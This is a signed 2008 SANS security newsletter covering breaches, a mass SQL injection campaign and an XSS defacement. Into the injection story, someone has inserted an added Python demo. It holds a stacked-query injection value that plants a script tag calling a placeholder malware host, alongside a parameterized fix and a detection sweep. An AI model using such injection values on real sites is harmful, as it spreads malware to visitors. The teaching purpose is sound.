-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
"Hundreds of thousands of Web sites - including several at the United Nations
and in the U.K. government -- have been hacked recently and seeded with code
that tries to exploit security flaws in Microsoft Windows to install
malicious software on visitors' machines," wrote the Washington Post's Brian
Krebs yesterday. His entire posting, along with a related Computerworld
article, is listed in the SQL Injection story below. If you have a job in
cyber security management, the extraordinary shift by attackers to web
application attacks forces you to re-prioritize your staff and budget. If you
cannot tell your boss exactly how well protected your web apps are, he or she
will have to find someone who can, right away. Many of the most advanced web
application pioneers are coming to Las Vegas next month to share the lessons
they learned on which web application scanners work best, whom to trust for
web app pen testing, how to get application developers to support a major
improvement in application security, and more. It's a meeting you do not want
to miss, and it has web application pen testing and secure coding courses too.
You'll find details at http://www.sans.org/info/24609
And if you have at least 300 programmers, you can invite ten to fifteen of
them to take the new on-line secure coding skills assessment at no cost. It shows
them what they know and don't know about coding security (one in Java and one
in C). Email spa@sans.org to get started.
Alan
*************************************************************************
SANS NewsBites April 25, 2008 Vol. 10, Num. 33
*************************************************************************
TOP OF THE NEWS
UK Businesses Report Breaches Down, Security Spending Up
Hannaford is Beefing Up Security
The Demise of the End-User Security Industry?
THE REST OF THE WEEK'S NEWS
LEGAL MATTERS
LendingTree Files Suit Against Lenders for Unauthorized Data Access
WORMS, ACTIVE EXPLOITS, VULNERABILITIES & PATCHES
SQL Injection Attacks on the Rise Again
ATTACKS, INTRUSIONS, DATA THEFT & LOSS
Hacker Exploits Cross-Site Scripting Flaw on Obama's Website
UMass Amherst Health Services Computer System Breached
Hard Drive Sold at UConn Bookstore Contains Personal Data
MISCELLANEOUS
Where Does the Responsibility for Security Lie?
Security Companies Could Block Phorm Cookies
LIST OF UPCOMING FREE SANS WEBCASTS
********************* Sponsored By Palo Alto Networks *******************
End users are circumventing IT controls and are using a new
generation of Internet applications that are creating new security
risks for the enterprise. The Application Usage & Risk Report is an
analysis of actual application traffic from over 350,000 corporate
end users. Learn more by downloading the free report now!
http://www.sans.org/info/28343
*************************************************************************
TRAINING UPDATE
Where can you find the newest Penetration Testing techniques,
Application Pen Testing, Hacker Exploits, Secure Web Application
Development, Security Essentials, Forensics, Wireless, Auditing, both
new Pen Testing courses, CISSP, and SANS' other top-rated courses
plus evening sessions with Internet Storm Center handlers.
- - SANSFire 2008 in Washington DC (7/22-7/31) SANS' biggest summer program
with many bonus sessions and a big exhibition of security products:
http://www.sans.org/info/26774
- - London (6/2-6/7) and Amsterdam (6/16-6/21)
http://www.sans.org/secureeurope08
- - San Diego (5/9-5/16) http://www.sans.org/securitywest08
- - Toronto (5/10-5/16) http://www.sans.org/toronto08
- - and in 100 other cities and on line any time: www.sans.org
*************************************************************************
TOP OF THE NEWS
--UK Businesses Report Breaches Down, Security Spending Up
(April 22 & 23, 2008)
Over the last six years, security spending at UK companies has
increased more than threefold from two percent to seven percent of
the IT budget; during that same time, the overall cost of security
breaches has dropped by one-third. The average cost of breaches
varies depending on the size of the company from GBP 15,000 (US
$29,632) to GBP 1.5 million (US $2.96 million). However, 21 percent
of the companies surveyed spend less than one percent of their IT
budget on security. Ninety four percent of wireless networks are
encrypted, compared with 47 percent six years ago, but roughly 80
percent of companies that had computers stolen had not encrypted
their hard drives. The study is conducted by a consortium managed by
PricewaterhouseCoopers on behalf of the UK Department of Business,
Enterprise and Regulatory Reform (BERR) for its 2008 Information
Security Breaches Survey (ISBS). The survey is conducted every two
years.
http://www.theregister.co.uk/2008/04/22/infosec_security_survey/print.html
http://software.silicon.com/security/0,39024655,39201844,00.htm
http://www.pwc.co.uk/eng/publications/berr_information_security_breaches_survey_2008.html
--Hannaford is Beefing Up Security
(April 22, 23 & 24, 2008)
Hannaford Bros. says it is spending millions of dollars to improve
data security after a breach that compromised as many as 4.2 million
customer credit cards. The data were stolen while in transit during
the authentication phase of the purchases; Hannaford says that now
credit card data will be encrypted the whole time they are within
the company's network. Hannaford is also now using a "24/7 managed
security monitoring and detection service."
http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1310963,00.html
http://blog.washingtonpost.com/securityfix/2008/04/hannaford.html?nav=rss_blog
http://ap.google.com/article/ALeqM5ic85268s4GzOT78ixJKz-vlSzxuwD90725C00
--The Demise of the End-User Security Industry?
(April 22 & 23, 2008)
Bruce Schneier writes in his blog that attendees at the recent RSA
Conference were not buying what the 350 exhibitors were selling because
"most ... can't understand what the products do or why they should
buy them." Schneier views this as the beginning of a sea change that
will see the demise of the end-user security industry while security is
increasingly built into the IT products themselves. Schneier likens
baked-in security in IT products to the security features of cars,
which are not sold separately yet are valuable and important.
http://www.schneier.com/blog/archives/2008/04/the_rsa_confere_1.html
[Editor's Note (Skoudis): Fascinating read. My gut tells me that
he's right, but it might take 5 or 10 years to get there.
(Schultz): End user security, a hyped up marketing term, is going to
be a short-lived approach to security, but not for the reason Schneier
mentions. Workstations, especially Windows workstations, have become
fat clients, and they will become even fatter over time. Adding end
user security functionality to them only bloats them more.
(Northcutt): I believe there is more to Bruce's insight than the
writeup implies. Here is a quote, "The booths are filled with broad
product claims, meaningless security platitudes, and unintelligible
marketing literature." He is right! The vendors are using PR firms and
marketing people who know nothing about security and everything about
differentiation. It hurts the industry. Get the engineers to describe
the products (in terms of what they actually do for the customer)
and have their writing scrubbed by a good developmental editor,
and vendors will sell more product.]
--Security Companies Could Block Phorm Cookies
(April 22, 2008)
Some security companies say they will block cookies from Phorm's
targeting advertisement service when it is launched. Although one
ISP that has agreed to use Phorm says it will be strictly an opt-in
service, other ISPs plan to make it an opt-out service, leading at
least one security company to say it does not meet the criteria for
informed consent and that its product will identify Phorm cookies
as adware. Other companies say they will keep a close eye on Phorm
when it launches and take action as they see fit.
http://news.bbc.co.uk/2/hi/technology/7359024.stm
[Editor's Note (Northcutt): This is the company formerly known as
121Media, with the proprietary "Open Internet Exchange" architecture. I
am just thankful this particular social experiment (monitoring
browsing habits and serving up targeted advertising) is in the UK,
not the US. "Honest love, I have no idea why my computer keeps serving
up ads for ______________" ]
********************** Sponsored Links: *******************************
1) Listen to the SANS Tool Talk web cast, Log Management for Security
Monitoring and IT Operations http://www.sans.org/info/28348
*************************************************************************
THE REST OF THE WEEK'S NEWS
LEGAL MATTERS
--LendingTree Files Suit Against Lenders for Unauthorized Data Access
(April 22 & 24, 2008)
LendingTree has filed a lawsuit against five lenders for accessing
customer information without authorization. The lawsuit alleges that
former LendingTree executives took passwords and allowed the lenders
to access the sensitive customer data. LendingTree believes at least
one of the lenders paid the executives for the passwords and then
turned around and sold them or the information they accessed with the
passwords. There is no evidence that the defendants used the data for
any other purpose than to offer loans. The compromised data include
names, Social Security numbers (SSNs), and income and employment
information. LendingTree has notified affected customers by mail; the
breach affects people who submitted data between October 2006 and
early 2008.
http://www.latimes.com/business/la-fi-lendingtree24apr24,1,4088698.story
http://www.news.com/8301-10784_3-9926007-7.html?tag=nefd.top
WORMS, ACTIVE EXPLOITS, VULNERABILITIES & PATCHES
--SQL Injection Attacks on the Rise Again
(April 23, 2008)
The JavaScript attacks that have been plaguing websites since the
beginning of the year have begun another round. Many of the infected
websites are legitimate and well visited, including several affiliated
with the United Nations and the UK government. The attacks use SQL
injection techniques to infect the websites. Although the malicious
payload associated with the attack is now hosted at a different domain
from where it was last time the attacks spiked, it is still at a
Chinese IP address. When surfers visit infected sites, the JavaScript
loads malware onto their computers and then redirects their browsers to
a page hosted on the Chinese server. The malware attempts a variety
of exploits once it has been loaded onto the computer.
Internet Storm Center: https://isc.sans.org/diary.html?storyid=4331
http://blog.washingtonpost.com/securityfix/2008/04/hundreds_of_thousands_of_micro_1.html
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9079961&source=rss_topic17
[Editor's Note (Skoudis): These blended attack vectors are an
interesting phenomenon -- but leveraging SQL Injection to put malicious
Javascript on a website to exploit browsers that surf there is just
scratching the surface. There are a lot of these kinds of vectors
that blur the strict distinctions between web app and network attacks.
Many penetration testers have split up into "network pen testers" and
"web app pen testers", specializing in either bucket. While that's
understandable, there is incredible power in being able to work deeply
on both sides of that divide. The bad guys are seeing that now,
and really good pen testers need to leverage these blended vectors
as well.
(Honan): The Internet Storm Center has some good guidelines on how to
deal with this attack, including blocking access to the malware hosting
site at 2117966.net. http://isc.sans.org/diary.html?storyid=4139 ]
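The mechanism the story describes, as an added example that is not part of the newsletter or of the ISC diary it cites: a minimal model of a content-management query where untrusted input is pasted into SQL text, so that one crafted parameter seeds every stored page with a script tag, placed beside the parameterized form that treats the same input as plain data, plus the kind of sweep a site owner runs afterwards to find rows that were already seeded. The "news" table, its columns, the host malicious-host.invalid and the sample parameter are all constructed for this demonstration and are not the campaign's actual payload.

```python
"""Added example (not from SANS NewsBites or the ISC diary): SQL injection
that seeds stored HTML with a script tag, the parameterized fix, and a
defensive sweep for rows already seeded. All names and data are constructed."""
import re
import sqlite3

# Placeholder host; the real campaign's domains are in the ISC diary.
INJECTED_TAG = '<script src="http://malicious-host.invalid/b.js"></script>'
SCRIPT_TAG_RE = re.compile(r"<\s*script\b[^>]*>", re.IGNORECASE)


def setup_db():
    """Constructed sample: a 'news' table standing in for the CMS tables the
    campaign overwrote, one row per article."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news (title, body) VALUES (?, ?)",
        [("Annual report", "Full text of the report."),
         ("Press release", "Details of the release.")],
    )
    conn.commit()
    return conn


def update_body_vulnerable(conn, article_id, new_body):
    """The defect that makes the attack possible: untrusted input spliced into
    SQL text. executescript() runs stacked statements, as the database engines
    targeted by the campaign did, so a crafted id reaches every row."""
    sql = f"UPDATE news SET body = '{new_body}' WHERE id = {article_id}"
    conn.executescript(sql)
    conn.commit()


def update_body_parameterized(conn, article_id, new_body):
    """The fix: bind values through placeholders so input is data, never SQL.
    Returns the number of rows changed (0 when the id matches nothing)."""
    cur = conn.execute("UPDATE news SET body = ? WHERE id = ?", (new_body, article_id))
    conn.commit()
    return cur.rowcount


def find_seeded_rows(conn):
    """Defender sweep: ids of rows whose stored HTML carries a script tag,
    the indicator a site owner looks for after a campaign like this one."""
    return [row_id for row_id, body in conn.execute("SELECT id, body FROM news")
            if SCRIPT_TAG_RE.search(body or "")]


def demo():
    """Runs the same constructed input through both code paths.
    Returns (rows seeded via the vulnerable path, rows changed via the
    parameterized path, rows seeded via the parameterized path)."""
    # Constructed id that appends a second statement tagging every row.
    stacked_id = "1; UPDATE news SET body = body || '" + INJECTED_TAG + "'"

    vuln = setup_db()
    update_body_vulnerable(vuln, stacked_id, "harmless edit")
    seeded_vulnerable = find_seeded_rows(vuln)

    safe = setup_db()
    changed = update_body_parameterized(safe, stacked_id, "harmless edit")
    seeded_safe = find_seeded_rows(safe)
    return seeded_vulnerable, changed, seeded_safe


if __name__ == "__main__":
    print(demo())
```

With the vulnerable path both sample rows end up carrying the script tag; with placeholders the stacked text is compared against the id column as an ordinary value, matches nothing and changes no rows. In practice the id would also be validated as an integer at the application boundary, and the sweep would be run over every text column the CMS renders, not just one.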
ATTACKS, INTRUSIONS, DATA THEFT & LOSS
--Hacker Exploits Cross-Site Scripting Flaw on Obama's Website
(April 24, 2008)
A hacker exploited a cross-site scripting vulnerability in Senator
Barack Obama's website to redirect people visiting certain sections of
the site to the website of Senator Hillary Clinton. The vulnerability
has been fixed, and while the attack does not appear to have had
a malicious intent, the incident draws attention to the fact that
political candidates need to be attentive to security issues on
their websites so as not to expose site visitors to malware that
could infect their computers and/or steal sensitive data.
http://www.cbc.ca/cp/technology/080424/z042415A.html
--UMass Amherst Health Services Computer System Breached
(April 22, 2008)
Officials at the University of Massachusetts at Amherst have uncovered
evidence of a data security breach on the University Health Services
computer system. They believe the attackers were looking for a place
to host illegal download files. University Health Services has
records on more than half of UMass Amherst students. Officials are
still assessing the incident.
http://www.cbs3springfield.com/news/local/18021744.html
--Hard Drive Sold at UConn Bookstore Contains Personal Data
(April 21 & 24, 2008)
A University of Connecticut (UConn) student who bought a 500 GB hard
drive from the UConn Co-op bookstore found it contained sensitive
personal details of 10 people who are in some way affiliated with the
University. Investigators believe the affected individuals all had
their computers serviced at the Co-op in the last several months. An
unnamed professor said when he brought his computer in for servicing,
he agreed to allow them to make a copy of his hard drive, but expected
that the data would be destroyed once the work was complete. The
compromised data include pictures, Word documents, and images of
credit cards and driver's licenses.
http://www.wfsb.com/news/15949434/detail.html
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9080162
[Editor's Note (Grefer): When you get a system serviced, especially
when this is done externally, ask first about data handling procedure,
then decide if it is worth the risk, and preferably obtain something
in writing.]
MISCELLANEOUS
--Where Does the Responsibility for Security Lie?
(April 23, 2008)
A panel debate at Infosecurity Europe 2008 focused on the locus
of responsibility for security in IT products. Panel members
voiced opinions that vendors need to take responsibility for
building security into their products, but that ultimately,
IT departments are responsible for the security of the
code they use, whether it is their own or someone else's.
http://software.silicon.com/security/0,39024888,39201852,00.htm?r=1
[Editor's Note (Ranum): There is so much blame to go around, it's
hardly funny. But the bottom line is that responsibility must go to
leadership. That's the CEOs, CIOs, CTOs, and middle management. Making
sure that the designs are good and the details are covered is why
they get paid the big bucks (and sometimes the small bucks).]
UPCOMING SANS WEBCAST SCHEDULE
Tool Talk Webcast: Staying on Top of the SANS Top 20 with CORE IMPACT
WHEN: Tuesday, April 29, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Alex Horan
http://www.sans.org/info/25539
Sponsored By: Core Security
The 2007 "SANS Top 20 Internet Security Risks" report makes it clear
that attackers can now circumvent many traditional countermeasures,
so simply implementing countermeasures is no longer enough. In fact,
short of experiencing a breach, the only way to really know your
security posture is by continually testing the defenses you've worked
so hard to put in place.
***
SANS Special Webcast: The Little Hybrid Web Worm That Could
WHEN: Wednesday, April 30, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Billy Hoffman
http://www.sans.org/info/24614
Sponsored By: HP
This webcast examines the possibility of hybrid web worms which
use several methods to overcome the limitations of current web
worms. Specifically the authors examine how a hybrid web worm:
mutates itself to evade defenses; updates itself with new attack
vectors while in the wild; and finds and exploits targets regardless
of whether they are client web browsers or web servers.
***
WhatWorks in Intrusion Detection and Prevention: Easing the Pains of PCI
Compliance at AirTran Airways:
WHEN: Tuesday, May 06, 2008 at 1:00 PM EDT (UTC/GMT)
FEATURING: Alan Paller and Michelle Stewart
http://www.sans.org/info/27099
Sponsored By: Lancope http://www.lancope.com/
Looking for a solution to ease the pains of PCI compliance, the data
security manager for AirTran Airways needed a product that provided
increased visibility into network behavior and accountability. It
had to be behavior based and capable of collecting information from
a widely dispersed network. She found a solution that was scalable,
cost-effective and helps to quickly identify and resolve network and
security issues.
***
Internet Storm Center Webcast: Threat Update
WHEN: Wednesday, May 14, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Johannes Ullrich
http://www.sans.org/info/27109
Sponsored By: Core Security http://www.coresecurity.com/
The SANS Internet Storm Center (ISC) uses advanced data correlation
and visualization techniques to analyze data collected from thousands
of sensors in over sixty countries. Experienced analysts constantly
monitor the Storm Center data feeds searching for trends and anomalies
in order to identify potential threats. When a threat is identified,
the team immediately begins an intensive investigation to gauge the
threat's severity and impact. This monthly webcast discusses recent
threats observed by the Internet Storm Center, and discusses new
software vulnerabilities or system exposures that were disclosed over
the past month. The general format is about 30 minutes of presentation
by senior ISC staff, followed by a question and answer period.
***
Security Inside the Perimeter: Confronting the Gap Between Talking About the
Threat and Doing Something About it
WHEN: Thursday, May 15, 2008 at 1:00 PM EDT (1700 UTC/GMT)
FEATURING: Paul Smith
http://www.sans.org/info/27114
Sponsored By: PacketMotion http://www.packetmotion.com/
Most security and IT professionals agree that the corporate network
"perimeter" is no longer viable due to laptops, tunneling applications,
VPNs and wireless, etc. But network security conventional wisdom is
still very perimeter oriented. Why the inconsistency? Perhaps people
really don't think the problem is that significant and the risk
is not that high. Or maybe they do think it's a real problem, but
hesitate to act because of cost, complexity, and risk to application
availability. This webinar will review the key aspects of this
inconsistency and offer solutions to better manage the "inside risk."
*******************************************************************
Be sure to check out the following FREE SANS archived webcasts:
Tool Talk Webcast: The ABC's of Dealing with Unique Network Security
Risks in a World of Open Campus Networks
WHEN: Wednesday, March 5, 2008 at 1:00 PM EST (1800 UTC/GMT)
FEATURING: Brian Mehlman
http://www.sans.org/info/22979
Sponsored By: Q1 Labs
SANS Special Webcast: A Response to the "Cold Boot Attack" Announcement
WHEN: Thursday, March 6, 2008 at 3:00 PM EST (1900 UTC/GMT)
FEATURING: John Strand
https://www.sans.org/webcasts/show.php?webcastid=91884
********************************************************************
The Editorial Board of SANS NewsBites
Eugene Schultz, Ph.D., CISM, CISSP is CTO of High Tower Software and
the author/co-author of books on Unix security, Internet security,
Windows NT/2000 security, incident response, and intrusion detection
and prevention. He was also the co-founder and original project manager
of the Department of Energy's Computer Incident Advisory Capability
(CIAC).
John Pescatore is Vice President at Gartner Inc.; he has worked in
computer and network security since 1978.
Stephen Northcutt founded the GIAC certification and currently serves
as President of the SANS Technology Institute, a post graduate level
IT Security College, www.sans.edu.
Johannes Ullrich is Chief Technology Officer of the Internet Storm
Center.
Howard A. Schmidt served as CSO for Microsoft and eBay and as
Vice-Chair of the President's Critical Infrastructure Protection
Board.
Ed Skoudis is co-founder of Intelguardians, a security research and
consulting firm, and author and lead instructor of the SANS Hacker
Exploits and Incident Handling course.
Tom Liston is a Senior Security Consultant and Malware Analyst for
Intelguardians, a handler for the SANS Institute's Internet Storm
Center, and co-author of the book Counter Hack Reloaded.
Dr. Eric Cole is an instructor, author and fellow with The SANS
Institute. He has written five books, including Insider Threat and
he is a senior Lockheed Martin Fellow.
Bruce Schneier has authored eight books -- including BEYOND
FEAR and SECRETS AND LIES -- and dozens of articles and academic
papers. Schneier has regularly appeared on television and radio, has
testified before Congress, and is a frequent writer and lecturer on
issues surrounding security and privacy.
Mason Brown is one of a very small number of people in the information
security field who have held a top management position in a Fortune
50 company (Alcoa). He is leading SANS' global initiative to improve
application security.
Marcus J. Ranum built the first firewall for the White House and
is widely recognized as a security products designer and industry
innovator.
Mark Weatherford, CISSP, CISM, is the Chief Information Security
Officer for the State of Colorado.
Alan Paller is director of research at the SANS Institute
Clint Kreitner is the founding President and CEO of The Center for
Internet Security.
Rohit Dhamankar is the Lead Security Architect at TippingPoint, a
division of 3Com, and authors the critical vulnerabilities section
of the weekly SANS Institute's @RISK newsletter and is the project
manager for the SANS Top20 2005 and the Top 20 Quarterly updates.
Koon Yaw Tan is Assistant Director at Monetary Authority of Singapore
(MAS) and a handler for the SANS Institute's Internet Storm Center.
Gal Shpantzer is a trusted advisor to several successful IT outsourcing
companies and was involved in multiple SANS projects, such as the
E-Warfare course and the Business Continuity Step-by-Step Guide.
Brian Honan is an independent security consultant based in Dublin,
Ireland.
Roland Grefer is an independent consultant based in Clearwater,
Florida.
Please feel free to share this with interested parties via email,
but no posting is allowed on web sites. For a free subscription,
(and for free posters) or to update a current subscription, visit
http://portal.sans.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFIEkTm+LUG5KFpTkYRAqScAJ9jefR9QDoCAdZIM8cLFHsqyOZurwCfVvfi
zNm7SkQZdf2rHRTj4LgyL+U=
=QAOU
-----END PGP SIGNATURE-----